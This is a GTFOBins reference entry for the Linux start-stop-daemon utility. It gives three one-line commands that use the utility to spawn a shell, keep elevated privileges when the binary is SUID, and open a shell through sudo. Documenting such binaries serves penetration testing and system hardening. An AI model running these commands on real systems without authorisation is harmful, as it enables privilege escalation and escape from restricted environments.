GTFOBins.github.io/_gtfobins/start-stop-daemon.md

222 B

functions
shell suid sudo
code
start-stop-daemon -n $RANDOM -S -x /bin/sh
code
./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
code
sudo start-stop-daemon -n $RANDOM -S -x /bin/sh